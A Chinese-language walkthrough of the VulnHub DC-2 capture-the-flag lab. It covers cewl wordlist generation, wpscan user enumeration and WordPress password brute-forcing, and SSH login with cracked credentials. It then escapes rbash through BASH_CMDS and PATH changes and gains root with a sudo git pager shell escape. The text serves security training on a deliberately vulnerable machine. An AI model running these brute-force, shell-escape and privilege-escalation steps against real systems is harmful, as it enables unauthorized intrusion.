记对VnlnHub_DC-2的一次渗透测试
字数 1126 2025-08-19 12:40:31

DC-2 渗透测试详细教学文档

1. 环境准备与初始信息收集

1.1 靶机IP扫描与DNS解析

  • 问题:无法跟随重定向至http://dc-2/,说明没有域名解析
  • 解决方案:配置本地hosts文件
    # /etc/hosts
    <靶机IP> dc-2
    

1.2 Flag 1获取

Flag 1内容

Your usual wordlists probably won't work, so instead, maybe you just need to be cewl.
More passwords is always better, but sometimes you just can't win them all.
Log in as one to see the next flag.
If you can't find it, log in as another.

关键提示

  • 需要使用cewl工具生成字典
  • 需要以不同用户身份登录

2. WordPress渗透

2.1 使用cewl生成密码字典

  • 安装cewl:sudo apt install cewl
  • 基本用法:
    cewl http://dc-2 -w passwd.txt
    
  • 高级选项:
    • -d <depth>:爬取深度,默认2
    • -m <min_length>:最小单词长度,默认3
    • --with-numbers:包含带数字的单词
    • -a:包含元数据

2.2 WordPress信息收集

  • 识别CMS为WordPress 4.7.10
  • 扫描后台地址:通常为/wp-admin/wp-login.php

2.3 用户名枚举

使用wpscan进行用户名枚举:

wpscan --url http://dc-2 -e u

2.4 密码爆破

方法一:使用BurpSuite

  1. 拦截登录请求
  2. 发送到Intruder模块
  3. 设置用户名和密码字典

方法二:使用wpscan

wpscan --url http://dc-2 --passwords passwd.txt --usernames user.txt

成功凭证

  • Username: jerry / Password: adipiscing
  • Username: tom / Password: parturient

2.5 Flag 2获取

Flag 2内容

If you can't exploit WordPress and take a shortcut, there is another way.
Hope you found another entry point.

关键提示

  • 除了WordPress外,还有另一个入口点

3. SSH服务利用

3.1 端口扫描发现

  • 发现7744端口运行SSH服务

3.2 使用tom账户登录

ssh tom@dc-2 -p 7744
# 密码: parturient

3.3 Flag 3获取

Flag 3内容

Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.

关键提示

  • 需要切换到jerry用户

4. rbash逃逸技术

4.1 识别rbash限制

  • 发现cat等命令无法使用
  • 确认当前shell为受限bash

4.2 绕过rbash限制

BASH_CMDS[a]=/bin/sh;a
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin

4.3 切换到jerry用户

su jerry
# 密码: adipiscing

4.4 Flag 4获取

Flag 4内容

Good to see that you've made it this far - but you're not home yet. 
You still need to get the final flag (the only flag that really counts!!!). 
No hints here - you're on your own now. :-) 
Go on - git outta here!!!!

关键提示

  • 需要获取root权限
  • 提示使用git命令

5. 权限提升

5.1 检查sudo权限

sudo -l
# 发现jerry可以以root身份运行git

5.2 利用git提权

sudo git -p help config

在显示的页面中输入:

!/bin/bash

5.3 Flag 5获取

Flag 5内容

Congratulatons!!!
A special thanks to all those who sent me tweets
and provided me with feedback - it's all greatly
appreciated.
If you enjoyed this CTF, send me a tweet via @DCAU7.

6. 总结与关键步骤

  1. 初始访问

    • 配置hosts文件
    • 使用cewl生成字典
    • 爆破WordPress登录
  2. 横向移动

    • 通过SSH服务(7744端口)登录
    • 绕过rbash限制
    • 切换用户
  3. 权限提升

    • 利用sudo git提权
  4. 关键工具

    • cewl
    • wpscan
    • BurpSuite
    • SSH客户端
  5. 学习要点

    • 自定义字典生成
    • WordPress安全测试
    • rbash逃逸技术
    • sudo权限滥用提权
DC-2 渗透测试详细教学文档 1. 环境准备与初始信息收集 1.1 靶机IP扫描与DNS解析 问题:无法跟随重定向至http://dc-2/,说明没有域名解析 解决方案:配置本地hosts文件 1.2 Flag 1获取 Flag 1内容 : 关键提示 : 需要使用cewl工具生成字典 需要以不同用户身份登录 2. WordPress渗透 2.1 使用cewl生成密码字典 安装cewl: sudo apt install cewl 基本用法: 高级选项: -d <depth> :爬取深度,默认2 -m <min_length> :最小单词长度,默认3 --with-numbers :包含带数字的单词 -a :包含元数据 2.2 WordPress信息收集 识别CMS为WordPress 4.7.10 扫描后台地址:通常为 /wp-admin 或 /wp-login.php 2.3 用户名枚举 使用wpscan进行用户名枚举: 2.4 密码爆破 方法一:使用BurpSuite 拦截登录请求 发送到Intruder模块 设置用户名和密码字典 方法二:使用wpscan 成功凭证 : Username: jerry / Password: adipiscing Username: tom / Password: parturient 2.5 Flag 2获取 Flag 2内容 : 关键提示 : 除了WordPress外,还有另一个入口点 3. SSH服务利用 3.1 端口扫描发现 发现7744端口运行SSH服务 3.2 使用tom账户登录 3.3 Flag 3获取 Flag 3内容 : 关键提示 : 需要切换到jerry用户 4. rbash逃逸技术 4.1 识别rbash限制 发现cat等命令无法使用 确认当前shell为受限bash 4.2 绕过rbash限制 4.3 切换到jerry用户 4.4 Flag 4获取 Flag 4内容 : 关键提示 : 需要获取root权限 提示使用git命令 5. 权限提升 5.1 检查sudo权限 5.2 利用git提权 在显示的页面中输入: 5.3 Flag 5获取 Flag 5内容 : 6. 总结与关键步骤 初始访问 : 配置hosts文件 使用cewl生成字典 爆破WordPress登录 横向移动 : 通过SSH服务(7744端口)登录 绕过rbash限制 切换用户 权限提升 : 利用sudo git提权 关键工具 : cewl wpscan BurpSuite SSH客户端 学习要点 : 自定义字典生成 WordPress安全测试 rbash逃逸技术 sudo权限滥用提权